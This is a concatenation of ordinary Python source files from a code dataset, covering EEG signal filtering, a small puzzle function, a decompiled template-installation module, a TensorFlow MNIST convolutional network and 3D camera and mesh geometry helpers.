(_size * 2*sr)))][:]\n\n\ndef get_dataset_P300():\n sr = 200\n data = []\n for subject in range(1, 27): # 1\n for session in range(1, 2): # 1\n subject_dataset = get_subdataset(subject, session)\n # first instance\n _index = [i + 1 for i, d in enumerate(subject_dataset[:, -1]) if d == 1]\n print(_index[0])\n all_channels = get_samples(_index[0], subject_dataset, sr)\n data.append(all_channels[:, 55])\n # channel O1\n return data\n\n\"\"\"\ndef butter_lowpass_filter(data, cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n y = signal.filtfilt(b, a, data)\n return y\n\n\ndef butter_highpass_filter(data, cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = signal.butter(order, normal_cutoff, btype='high', analog=False)\n y = signal.filtfilt(b, a, data)\n return y\n\n\ndef butter_bandpass_filter(data, lowcut, highcut, fs, order=5):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = butter(order, [low, high], btype='band')\n y = signal.filtfilt(b, a, data)\n return y\n\n\ndata = get_dataset()\n\nsubject1 = data[0]\nsubject2 = data[1]\nsubject3 = data[2]\n\nlp1 = butter_lowpass_filter(subject1, 50.0, 200)\nlp2 = butter_lowpass_filter(subject2, 50.0, 200)\nlp3 = butter_lowpass_filter(subject3, 50.0, 200)\n\nhp1 = butter_highpass_filter(lp1, 0.01, 200)\nhp2 = butter_highpass_filter(lp2, 0.01, 200)\nhp3 = butter_highpass_filter(lp3, 0.01, 200)\n\nb1 = butter_bandpass_filter(subject1, 0.01, 50.0, 200)\nb1fix = butter_bandpass_filter(subject1, 0.01, 50.0, 200, order=4)\n\nplt.plot(hp1, label='Subject 1')\nplt.plot(hp2, label='Subject 2')\nplt.plot(hp3, label='Subject 3')\nplt.ylabel('Amplitude [mV]')\nplt.xlabel('Samples')\nplt.legend()\nplt.title('Raw signals filtered')\nplt.show()\n\n\n#plt.plot(subject2)\nplt.plot(hp1, label='lowpass + highpass')\n#plt.plot(hp2, label='Subject 2')\n#plt.plot(hp3, label='Subject 3')\n#plt.plot(b1, label='bandpass1')\nplt.plot(b1, label='order5')\nplt.plot(b1fix, label='order4')\n#plt.plot(b2, label='bandpass2')\nplt.ylabel('Amplitude [mV]')\nplt.xlabel('Samples')\nplt.legend()\nplt.title('Raw signals filtered')\nplt.show()\n\"\"\"","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"459545692","text":"\n\ndef neon(lista):\n naj = 0\n pom 
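# A runnable sketch of the band-pass filtering that the commented-out block
# above describes; cutoffs, order and sampling rate are illustrative values,
# and the input is random noise standing in for one EEG channel.
import numpy as np
from scipy.signal import butter, filtfilt

def bandpass(data, lowcut, highcut, fs, order=5):
    nyq = 0.5 * fs  # Nyquist frequency
    b, a = butter(order, [lowcut / nyq, highcut / nyq], btype='band')
    return filtfilt(b, a, data)  # zero-phase: no group delay

channel = np.random.randn(520)            # ~2.6 s at 200 Hz
clean = bandpass(channel, 0.1, 50.0, 200)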
= lista[0]\n for x in lista[1:]:\n pom = pom+2\n naj = max(naj,pom +x)\n pom = max(pom,x)\n return naj\n\nprint(neon([1,10,1]))\n\n","sub_path":"logia/neony_liniowo.py","file_name":"neony_liniowo.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"313252469","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /anaconda/lib/python3.5/site-packages/gbpPy/templates.py\n# Compiled at: 2018-01-18 01:22:07\n# Size of source mod 2**32: 24343 bytes\nimport gbpPy.log as SID, shutil, os, re, filecmp\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\n\ndef check_and_remove_trailing_occurance(txt_in, occurance):\n n_occurance = len(occurance)\n if txt_in[-n_occurance:] == occurance:\n txt_out = txt_in[0:-n_occurance]\n flag_found = True\n else:\n txt_out = txt_in\n flag_found = False\n return (\n txt_out, flag_found)\n\n\ndef get_base_name(project_dir_abs):\n head, tail = os.path.split(project_dir_abs)\n if tail == '':\n head, tail = os.path.split(head)\n return tail\n\n\n_protected_inputs = [\n '_PARAMETERS.key', '_PARAMETERS.value']\n\nclass project_inputs:\n\n def __init__(self, user_params):\n self.list = []\n self.list.append({'name': '_PARAMETERS.key', 'input': [key for key in user_params.keys()]})\n self.list.append({'name': '_PARAMETERS.value', 'input': [val for val in user_params.values()]})\n for input_name_i in _protected_inputs:\n input_check = self.get_input(input_name_i)\n if not input_check:\n SID.error('Failed to add protected input {%s} to the project parameter list.' % input_name_i)\n\n for param_i_key, param_i_value in user_params.items():\n if hasattr(param_i_value, '__iter__') and not isinstance(param_i_value, str):\n self.list.append({'name': param_i_key, 'input': param_i_value})\n else:\n self.list.append({'name': param_i_key, 'input': [param_i_value]})\n\n def get_input(self, name_get):\n input_return = None\n for input_i in self.list:\n if input_i['name'] == name_get:\n input_return = input_i\n break\n\n return input_return\n\n def get_value(self, name_get, idx=0):\n input_get = self.get_input(name_get)\n if not input_get:\n SID.error('Failed to find requested parameter {%s} in project parameter list.' % name_get)\n if abs(idx) >= len(input_get):\n SID.error('Requested input index {%d} exceeds allowed bounds of paramerer {%s; size=%d}.' % (idx, name_get, size(input_get)))\n return input_get[idx]\n\n\ndef find_parameter_references(line):\n regex = re.compile('%[\\\\w:.]*%')\n matches = []\n for match in regex.finditer(line):\n param = {}\n directive = match.group().strip('%')\n if directive not in _protected_inputs:\n param['name'] = directive\n param['span'] = match.span()\n matches.append(param)\n\n return matches\n\n\ndef _perform_parameter_substitution_ith(line, params, idx=None):\n line_new = line\n regex = re.compile('%[\\\\w:.]*%')\n match = regex.search(line_new)\n n_lines = 1\n while match:\n directive = match.group().strip('%')\n param_insert = params.get_input(directive)\n param_insert_size = len(param_insert['input'])\n if param_insert_size > 1:\n if n_lines == 1:\n n_lines = param_insert_size\n else:\n if param_insert_size != 1 and n_lines != param_insert_size:\n SID.error('There is an input list size incompatibility (%d!=%d) in {%s}.' 
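# The %param% substitution implemented by find_parameter_references and
# _perform_parameter_substitution_ith above, in miniature: the same regex,
# applied with a plain dict. Template string and values are made up.
import re

def substitute(line, params):
    return re.sub(r'%([\w:.]*)%', lambda m: str(params[m.group(1)]), line)

assert substitute('dir=%BASE%/out', {'BASE': '/tmp'}) == 'dir=/tmp/out'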
% (n_lines, param_insert_size, line))\n if idx == None:\n line_new = line_new[0:match.start()] + str(param_insert['input'][0]) + line_new[match.end():]\n else:\n line_new = line_new[0:match.start()] + str(param_insert['input'][idx]) + line_new[match.end():]\n match = regex.search(line_new)\n\n if idx == None:\n return (n_lines, line_new)\n else:\n return line_new\n\n\ndef perform_parameter_substitution(line, params):\n n_lines, line_new = _perform_parameter_substitution_ith(line, params)\n lines_new = []\n if n_lines > 1:\n for idx in range(n_lines):\n lines_new.append(_perform_parameter_substitution_ith(line, params, idx=idx))\n\n else:\n lines_new.append(line_new)\n return lines_new\n\n\ndef format_template_names(name_list):\n name_txt = ''\n for i_name, name_i in enumerate(name_list):\n if i_name == 0:\n name_txt += name_i\n else:\n name_txt += ',' + name_i\n\n return name_txt\n\n\ndef update_element(element, update):\n return update == None or update == element.template_path_out()\n\n\nclass template_directory:\n\n def __init__(self, dirname_template, dirname):\n if not os.path.isdir(dirname):\n raise IsADirectoryError('Directory name {%s} passed to template_directory constructor does not point to a valid directory.' % dirname)\n dirname_rel_template = os.path.normpath(os.path.relpath(os.path.abspath(dirname), dirname_template))\n self.parse_name(dirname_rel_template)\n self._template_path = os.path.normpath(os.path.dirname(dirname_rel_template))\n self._full_path_in_abs = os.path.abspath(dirname)\n self.files = []\n self.dirname_template = dirname_template\n if os.path.islink(dirname):\n self.is_symlink = True\n else:\n self.is_symlink = False\n\n def parse_name(self, dirname_rel_template):\n self.name_in = os.path.basename(dirname_rel_template)\n self.name_out = self.name_in.replace('_dot_', '.', 1)\n self.name_out, self.is_link = check_and_remove_trailing_occurance(self.name_out, '.link')\n\n def is_root(self):\n return os.path.realpath(self.full_path_in()) == os.path.realpath(self.dirname_template)\n\n def full_path_in(self):\n return os.path.normpath(self._full_path_in_abs)\n\n def full_path_out(self, dir_install):\n return os.path.normpath(os.path.normpath(os.path.join(dir_install, self._template_path, self.name_out)))\n\n def template_path_in(self):\n return os.path.normpath(os.path.join(self._template_path, self.name_in))\n\n def template_path_out(self):\n return os.path.normpath(os.path.join(self._template_path, self.name_out))\n\n def install(self, dir_install, silent=False):\n try:\n if not self.is_root():\n if os.path.isdir(self.full_path_out(dir_install)):\n SID.log.open('Directory %s exists.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n symlink_path = os.path.relpath(self.full_path_in(), os.path.dirname(self.full_path_out(dir_install)))\n if not silent:\n if self.is_link:\n if os.path.lexists(self.full_path_out(dir_install)):\n os.unlink(self.full_path_out(dir_install))\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.open('Directory %s link updated.' % self.full_path_out(dir_install))\n else:\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.open('Directory %s linked.' % self.full_path_out(dir_install))\n else:\n os.mkdir(self.full_path_out(dir_install))\n SID.log.open('Directory %s created.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n SID.log.open('Directory %s linked silently.' % self.full_path_out(dir_install))\n else:\n SID.log.open('Directory %s created silently.' 
% self.full_path_out(dir_install))\n else:\n if os.path.isdir(self.full_path_out(dir_install)):\n SID.log.open('Directory %s -- root valid.' % self.full_path_out(dir_install))\n else:\n raise NotADirectoryError\n except:\n SID.log.error('Failed to install directory {%s}.' % self.full_path_out())\n\n def uninstall(self, dir_install, silent=False):\n try:\n if not self.is_root():\n if not os.path.isdir(self.full_path_out(dir_install)):\n SID.log.close('Not found.')\n else:\n if not silent:\n if self.is_link:\n os.unlink(self.full_path_out(dir_install))\n SID.log.close('Unlinked.')\n else:\n os.rmdir(self.full_path_out(dir_install))\n SID.log.close('Removed.')\n else:\n if self.is_link:\n SID.log.close('Unlinked silently.')\n else:\n SID.log.close('Removed silently.')\n else:\n SID.log.close('Root ignored.')\n except:\n SID.log.error('Failed to uninstall directory {%s}.' % self.name_out)\n\n\nclass template_file:\n\n def __init__(self, filename, dir_host):\n if not dir_host:\n dir_host = template_directory('.')\n self.parse_name(filename)\n self.dir_in = dir_host\n if not os.path.isfile(self.full_path_in()):\n raise FileNotFoundError('File name {%s} passed to template_file constructor does not point to a valid file.' % self.full_path_in())\n if os.path.islink(filename):\n self.is_symlink = True\n else:\n self.is_symlink = False\n\n def parse_name(self, filename):\n self.name_in = filename\n self.name_out = self.name_in.replace('_dot_', '.', 1)\n self.name_out, self.is_link = check_and_remove_trailing_occurance(self.name_out, '.link')\n if not self.is_link:\n self.name_out, self.is_template = check_and_remove_trailing_occurance(self.name_out, '.template')\n else:\n self.is_template = False\n\n def full_path_in(self):\n return os.path.normpath(os.path.join(self.dir_in.full_path_in(), self.name_in))\n\n def full_path_out(self, dir_install):\n return os.path.normpath(os.path.join(self.dir_in.full_path_out(dir_install), self.name_out))\n\n def template_path_in(self):\n return os.path.normpath(os.path.join(self.dir_in.template_path_in(), self.name_in))\n\n def template_path_out(self):\n return os.path.normpath(os.path.join(self.dir_in.template_path_out(), self.name_out))\n\n def install(self, dir_install, params=None, silent=False):\n project_params = project_inputs(params)\n try:\n if os.path.isfile(self.full_path_out(dir_install)):\n SID.log.comment(' --> %s exists.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n symlink_path = os.path.relpath(self.full_path_in(), self.dir_in.full_path_out(dir_install))\n if not silent:\n if self.is_link:\n if os.path.lexists(self.full_path_out(dir_install)):\n os.unlink(self.full_path_out(dir_install))\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.comment('--> %s link updated.' % self.full_path_out(dir_install))\n else:\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.comment('--> %s linked.' % self.full_path_out(dir_install))\n else:\n self.write_with_substitution(dir_install, params=project_params)\n SID.log.comment('--> %s created.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n SID.log.comment('--> %s linked silently.' % self.full_path_out(dir_install))\n else:\n SID.log.comment('--> %s created silently.' % self.full_path_out(dir_install))\n except:\n SID.log.error('Failed to install file {%s}.' 
% self.full_path_out(dir_install))\n\n def uninstall(self, dir_install, silent=False):\n try:\n if not os.path.isfile(self.full_path_out(dir_install)):\n SID.log.comment('--> %s not found.' % self.full_path_out(dir_install))\n else:\n if not silent:\n if self.is_link:\n os.unlink(self.full_path_out(dir_install))\n SID.log.comment('--> %s unlinked.' % self.full_path_out(dir_install))\n else:\n os.remove(self.full_path_out(dir_install))\n SID.log.comment('--> %s removed.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n SID.log.comment('--> %s unlinked silently.' % self.full_path_out(dir_install))\n else:\n SID.log.comment('--> %s removed silently.' % self.full_path_out(dir_install))\n except:\n SID.log.error('Failed to uninstall file {%s}.' % self.full_path_out(dir_install))\n\n def write_with_substitution(self, dir_install, params=None):\n try:\n if self.is_link:\n os.symlink(os.path.relpath(self.full_path_in(), os.path.dirname(self.full_path_out(dir_install))), self.full_path_out(dir_install))\n elif self.is_template:\n with open(self.full_path_in(), 'r') as (fp_in):\n with open(self.full_path_out(dir_install), 'w') as (fp_out):\n for line_in in fp_in:\n for line_out in perform_parameter_substitution(line_in, params):\n fp_out.write(line_out)\n\n else:\n shutil.copy2(self.full_path_in(), self.full_path_out(dir_install))\n except:\n SID.log.error('Failed write template file {%s}.' % self.name_in)\n\n\nclass template:\n\n def __init__(self, template_name=None, path=None):\n self.path = []\n self.dir = []\n self.name = []\n self.directories = []\n if template_name != None:\n self.add(template_name, path=path)\n\n def add(self, template_name, path=None):\n if not path:\n path = os.environ.get('GBPPY_TEMPLATE_PATH')\n if not path:\n path = './templates/'\n path_list = path.split(':')\n template_dir_abs = None\n for path_i in path_list:\n dir_test = os.path.join(path_i, template_name)\n if os.path.isdir(dir_test):\n template_dir_abs = dir_test\n break\n\n if not template_dir_abs:\n raise IsADirectoryError(\"Could not find template '%s' in template path {%s}\" % (template_name, path))\n template_path_dir, template_name = os.path.split(template_dir_abs)\n self.path.append(template_path_dir)\n self.dir.append(template_dir_abs)\n self.name.append(template_name)\n SID.log.open(\"Loading template {'%s' from %s}...\" % (self.name[(-1)], self.path[(-1)]))\n n_template_files = 0\n for root, dirs, files in os.walk(self.dir[(-1)]):\n dir_new = template_directory(self.dir[(-1)], root)\n self.add_directory(dir_new)\n for test_dir_i in os.listdir(root):\n test_dir = os.path.join(dir_new.full_path_in(), test_dir_i)\n if os.path.islink(test_dir) and os.path.isdir(test_dir):\n self.add_directory(template_directory(self.dir[(-1)], test_dir))\n\n for file_i in files:\n file_new = template_file(file_i, dir_new)\n if file_new.is_template:\n n_template_files += 1\n self.add_file(file_new)\n\n if n_template_files > 0:\n SID.log.open('Scanning template files for parameters...')\n self.params = set()\n for dir_i in self.directories:\n for file_i in [f for f in dir_i.files if f.is_template]:\n with open(file_i.full_path_in(), 'r') as (file_in):\n for line in file_in:\n param_refs = find_parameter_references(line)\n for param_ref_i in param_refs:\n self.params.add(param_ref_i['name'])\n\n SID.log.close('Done')\n self.print()\n SID.log.close('Done')\n\n def get_directory(self, template_path_out):\n for dir_i in self.directories:\n if dir_i.template_path_out() == template_path_out:\n return dir_i\n\n def 
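# How the symlink targets in install()/write_with_substitution are computed:
# os.path.relpath expresses the link source relative to the directory that
# will hold the link, so the link stays valid if both trees move together.
# Paths here are illustrative.
import os

link_dir = '/install/pkg/sub'             # directory containing the link
source = '/templates/pkg/sub/file.txt'    # file the link points at
assert os.path.relpath(source, link_dir) == '../../../templates/pkg/sub/file.txt'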
get_file(self, template_path_out):\n for dir_i in self.directories:\n for file_i in dir_i.files:\n if file_i.template_path_out() == template_path_out:\n return file_i\n\n def add_directory(self, dir_add):\n dir_check = self.get_directory(dir_add.template_path_out())\n if dir_check == None:\n self.directories.append(dir_add)\n\n def add_file(self, file_add):\n if file_add.dir_in.is_symlink:\n raise Exception('Can not add file {%s} to symlinked directory {%s}.' % (file_add.name_in, file_add.dir_in.name_in))\n dir_check = self.get_directory(file_add.dir_in.template_path_out())\n if dir_check == None:\n dir_out = file_add.dir_in\n else:\n dir_out = dir_check\n file_check = self.get_file(file_add.template_path_out())\n if file_check != None:\n if not filecmp.cmp(file_add.full_path_in(), file_check.full_path_in()):\n SID.log.error(\"There is a file incompatability between template files '%s' and '%s'.\" % (file_add.full_path_in(), file_check.full_path_in()))\n if file_check == None:\n dir_out.files.append(file_add)\n\n def n_files(self):\n n_files = 0\n for dir_i in self.directories:\n n_files += len(dir_i.files)\n\n return n_files\n\n def print(self):\n SID.log.open('Template contents:')\n SID.log.comment('n_directories=%d' % len(self.directories))\n SID.log.comment('n_files =%d' % self.n_files())\n SID.log.comment('n_parameters =%d' % len(self.params))\n for param_ref_i in self.params:\n SID.log.comment(' --> %s' % param_ref_i)\n\n for dir_i in sorted(self.directories, key=lambda dir_j: len(dir_j.template_path_out())):\n SID.log.open('Directory {%s}:' % dir_i.template_path_out())\n for file_i in sorted(dir_i.files, key=lambda file_j: file_j.template_path_out()):\n SID.log.comment('--> %s' % file_i.template_path_out())\n\n SID.log.close()\n\n SID.log.close()\n\n def _process_template(self, dir_install, params=None, uninstall=False, silent=False, update=None):\n name_txt = format_template_names(self.name)\n if not uninstall:\n if len(self.name) > 1:\n SID.log.open('Installing templates {%s} to {%s}...' % (name_txt, dir_install))\n else:\n SID.log.open('Installing template {%s} to {%s}...' % (name_txt, dir_install))\n flag_reverse_sort = False\n else:\n flag_reverse_sort = True\n if len(self.name) > 1:\n SID.log.open('Uninstalling templates {%s} from {%s}...' % (name_txt, dir_install))\n else:\n SID.log.open('Uninstalling template {%s} from {%s}...' % (name_txt, dir_install))\n for dir_i in sorted(self.directories, key=lambda k: len(k._full_path_in_abs), reverse=flag_reverse_sort):\n if not uninstall and update_element(dir_i, update):\n dir_i.install(dir_install, silent=silent)\n elif update_element(dir_i, update):\n SID.log.open('Uninstalling directory %s...' % dir_i.full_path_out(dir_install))\n for file_i in dir_i.files:\n if uninstall and update_element(file_i, update):\n file_i.uninstall(dir_install, silent=silent)\n elif update_element(file_i, update):\n file_i.install(dir_install, params=params, silent=silent)\n\n if uninstall and update_element(dir_i, update):\n dir_i.uninstall(dir_install, silent=silent)\n elif update_element(dir_i, update):\n SID.log.close()\n\n SID.log.close('Done.')\n\n def install(self, dir_out, params=None, silent=False, update=None):\n for param_i in self.params:\n if param_i not in params:\n SID.log.error('Required parameter {%s} is not present in template installation dictionary.' 
% param_i)\n\n self._process_template(dir_out, params=params, silent=silent, update=update)\n\n def uninstall(self, dir_out, silent=False, update=None):\n self._process_template(dir_out, uninstall=True, silent=silent, update=update)","sub_path":"pycfiles/gbpPy-0.1.macosx-10.6-x86_64.tar/templates.cpython-35.py","file_name":"templates.cpython-35.py","file_ext":"py","file_size_in_byte":21161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"531810136","text":"# This example is based on the tutorial from tensorflow. It uses a deep convolutional network to solve the mnist problem.\n# I've only added lines to transform my data into something ~= mnist dataset of the tutorial\n# Precision : 99.28 % \n#\n# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#\t\t http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"A very simple MNIST classifier.\nSee extensive documentation at\nhttp://tensorflow.org/tutorials/mnist/beginners/index.md\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\nimport gzip\nimport pickle\n\nimport tensorflow as tf\n\nFLAGS = None\n\ndef convert_to_hot_vector(numbers):\n\tmy_hot_vector = len(numbers)*[10*[0]]\n\tfor i in range(len(numbers)):\n\t\tmy_hot_vector[i] = tuple(hot_vector(numbers[i]))\n\tmy_hot_vector = tuple(my_hot_vector)\n\treturn my_hot_vector\n\ndef hot_vector(number):\n\tmy_vector = 10*[0]\n\tmy_vector[number] = 1\n\treturn my_vector\n\n# see https://www.tensorflow.org/get_started/mnist/pros\n\ndef weight_variable(shape):\n\tinitial = tf.truncated_normal(shape, stddev=0.1)\n\treturn tf.Variable(initial)\n\ndef bias_variable(shape):\n\tinitial = tf.constant(0.1, shape=shape)\n\treturn tf.Variable(initial)\n\ndef conv2d(x, W):\n\treturn tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n\treturn tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n\t\t\t\t\t\t\t\t\t\t\t\tstrides=[1, 2, 2, 1], padding='SAME')\n\ndef nextbatch(x,i,j):\n\tl = len(x)\n\twhile(j>l):\n\t\tj=j-l\n\t\ti=i-l\n\treturn x[i:j]\n\nif __name__ == '__main__':\n\t# Import data\n\twith gzip.open('mnist.pkl.gz', 'rb') as f:\n\t\ttrain_set, valid_set, test_set = pickle.load(f)\n\t\ttrain_x, train_y = train_set\n\t\ttrain_y = convert_to_hot_vector(train_y)\n\t\tvalid_x, valid_y = valid_set\n\t\ttest_x, test_y = test_set\n\t\ttest_y = convert_to_hot_vector(test_y)\n\n\t# Create the model\n\tx = tf.placeholder(tf.float32, [None, 784])\n\tW = tf.Variable(tf.zeros([784, 10]))\n\tb = tf.Variable(tf.zeros([10]))\n\ty = tf.matmul(x, W) + b\n\n\t# Define loss and optimizer\n\ty_ = tf.placeholder(tf.float32, [None, 10])\n\n\tsess = tf.InteractiveSession()\n\n\tW_conv1 = weight_variable([5, 5, 1, 32])\n\tb_conv1 = bias_variable([32])\n\n\tx_image = tf.reshape(x, [-1,28,28,1])\n\n\th_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + 
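# Why W_fc1 below is sized [7*7*64, 1024]: the 'SAME' convolutions keep the
# 28x28 spatial size and each 2x2 max-pool halves it, so two conv+pool
# stages give 28 -> 14 -> 7 over 64 feature maps. A shape-only check:
h = w = 28
for _ in range(2):          # two pooling stages
    h, w = h // 2, w // 2
assert (h, w, 7 * 7 * 64) == (7, 7, 3136)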
b_conv1)\n\th_pool1 = max_pool_2x2(h_conv1)\n\n\tW_conv2 = weight_variable([5, 5, 32, 64])\n\tb_conv2 = bias_variable([64])\n\n\th_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\th_pool2 = max_pool_2x2(h_conv2)\n\n\tW_fc1 = weight_variable([7 * 7 * 64, 1024])\n\tb_fc1 = bias_variable([1024])\n\n\th_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n\th_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n\tkeep_prob = tf.placeholder(tf.float32)\n\th_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n\tW_fc2 = weight_variable([1024, 10])\n\tb_fc2 = bias_variable([10])\n\n\ty_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n\n\tcross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n\ttrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\tcorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\tsess.run(tf.global_variables_initializer())\n\tfor i in range(20000):\n\t\ttrain_x_batch = nextbatch(train_x,i*50,(i+1)*50)\n\t\ttrain_y_batch = nextbatch(train_y,i*50,(i+1)*50)\n\t\tif (i%100 == 0) and (i != 0):\n\t\t\ttrain_accuracy = accuracy.eval(feed_dict={x:train_x_batch, y_: train_y_batch, keep_prob: 1.0})\n\t\t\tprint(\"step %d, training accuracy %g\"%(i, train_accuracy))\n\t\ttrain_step.run(feed_dict={x: train_x_batch, y_: train_y_batch, keep_prob: 0.5})\n\tprint(\"test accuracy %g\"%accuracy.eval(feed_dict={x: test_x, y_: test_y, keep_prob: 1.0}))\n\n","sub_path":"mnist/mnist_tf_deep.py","file_name":"mnist_tf_deep.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"478590072","text":"import numpy as np\nimport os\nimport trimesh\nimport copy\nimport matplotlib.pyplot as plt\n#import binvox_rw as binvox_rw\nimport math\nimport net_utils.basic as utils_basic\n\nimport ipdb\nst = ipdb.set_trace\n\ndef calc_rigid_transform(XX, YY):\n X = XX.copy().T\n Y = YY.copy().T\n\n mean_X = np.mean(X, 1, keepdims=True)\n mean_Y = np.mean(Y, 1, keepdims=True)\n X = X - mean_X\n Y = Y - mean_Y\n C = np.dot(X, Y.T)\n U, S, Vt = np.linalg.svd(C)\n D = np.eye(3)\n D[2, 2] = np.linalg.det(np.dot(Vt.T, U.T))\n R = np.dot(Vt.T, np.dot(D, U.T))\n T = mean_Y - np.dot(R, mean_X)\n\n '''\n YY_fitted = (np.dot(R, XX.T) + T).T\n print(\"MSE fit\", np.mean(np.square(YY_fitted - YY)))\n '''\n\n return R, T\n\n\ndef save_obj(vertices: np.ndarray, faces: np.ndarray, filepath: str):\n with open(filepath, 'w') as f:\n f.write(\"# OBJ file\\n\")\n for v in vertices:\n f.write(\"v %.4f %.4f %.4f\\n\" % (v[0],v[1],v[2]))\n for face in faces:\n f.write(\"f\")\n for vertex in face:\n f.write(\" %d\" % (vertex + 1))\n f.write(\"\\n\")\n\n\ndef as_mesh(scene_or_mesh):\n \"\"\"\n Convert a possible scene to a mesh.\n\n If conversion occurs, the returned mesh has only vertex and face data.\n \"\"\"\n if isinstance(scene_or_mesh, trimesh.Scene):\n if len(scene_or_mesh.geometry) == 0:\n mesh = None # empty scene\n else:\n # we lose texture information here\n mesh = trimesh.util.concatenate(\n tuple(trimesh.Trimesh(vertices=g.vertices, faces=g.faces)\n for g in scene_or_mesh.geometry.values()))\n else:\n assert(isinstance(scene_or_mesh, trimesh.Trimesh))\n mesh = scene_or_mesh\n return mesh\n\n\n#filename = \"/home/htung/Documents/2021/example_meshes/0000_obj1_1.binvox\"\n\ndef split_intrinsics(K):\n # K is B x 3 x 3 or B x 4 x 4\n fx = K[:,0,0]\n fy = K[:,1,1]\n x0 = K[:,0,2]\n y0 = K[:,1,2]\n 
return fx, fy, x0, y0\n\ndef apply_4x4(RT, XYZ):\n \"\"\"\n RT: B x 4 x 4\n XYZ: B x N x 3\n \"\"\"\n B, N, _ = XYZ.shape\n ones = np.ones([B, N, 1])\n XYZ1 = np.concatenate([XYZ, ones], 2)\n XYZ1_t = np.transpose(XYZ1, (0, 2, 1))\n # this is B x 4 x N\n\n XYZ2_t = np.matmul(RT, XYZ1_t)\n XYZ2 = np.transpose(XYZ2_t, (0, 2, 1))\n XYZ2 = XYZ2[:,:,:3]\n return XYZ2\n\n\ndef Pixels2CameraSingle(x, y, z, fx, fy, x0, y0):\n # x, y are N,\n # z is corresponding depth so it is N,\n # fx, fy, x0, y0 are all N,\n EPS = 1e-6\n x = ((z+EPS)/fx)*(x-x0)\n y = ((z+EPS)/fy)*(y-y0)\n xyz = np.stack([x,y,z], axis=1)\n return xyz\n\n\ndef Pixels2Camera(x,y,z,fx,fy,x0,y0):\n # x and y are locations in pixel coordinates, z is a depth image in meters\n # their shapes are B x H x W\n # fx, fy, x0, y0 are scalar camera intrinsics\n # returns xyz, sized [B,H*W,3]\n # there is no randomness here\n\n B, H, W = list(z.shape)\n\n fx = np.reshape(fx, [B,1,1])\n fy = np.reshape(fy, [B,1,1])\n x0 = np.reshape(x0, [B,1,1])\n y0 = np.reshape(y0, [B,1,1])\n\n # unproject\n EPS = 1e-6\n x = ((z+EPS)/fx)*(x-x0)\n y = ((z+EPS)/fy)*(y-y0)\n\n x = np.reshape(x, [B,-1])\n y = np.reshape(y, [B,-1])\n z = np.reshape(z, [B,-1])\n xyz = np.stack([x,y,z], axis=2)\n return xyz\n\ndef get_intrinsics_from_projection_matrix(proj_matrix, size):\n H, W = size\n vfov = 2.0 * math.atan(1.0/proj_matrix[1][1]) * 180.0/ np.pi\n vfov = vfov / 180.0 * np.pi\n tan_half_vfov = np.tan(vfov / 2.0)\n tan_half_hfov = tan_half_vfov * H / float(H)\n fx = W / 2.0 / tan_half_hfov # focal length in pixel space\n fy = H / 2.0 / tan_half_vfov\n\n pix_T_cam = np.array([[fx, 0, W / 2.0],\n [0, fy, H / 2.0],\n [0, 0, 1]])\n return pix_T_cam\n\n\n\ndef get_depth_values(image: np.array, depth_pass: str = \"_depth\", width: int = 256, height: int = 256, near_plane: float = 0.1, far_plane: float = 100) -> np.array:\n \"\"\"\n Get the depth values of each pixel in a _depth image pass.\n The far plane is hardcoded as 100. The near plane is hardcoded as 0.1.\n (This is due to how the depth shader is implemented.)\n :param image: The image pass as a numpy array.\n :param depth_pass: The type of depth pass. This determines how the values are decoded. Options: `\"_depth\"`, `\"_depth_simple\"`.\n :param width: The width of the screen in pixels. See output data 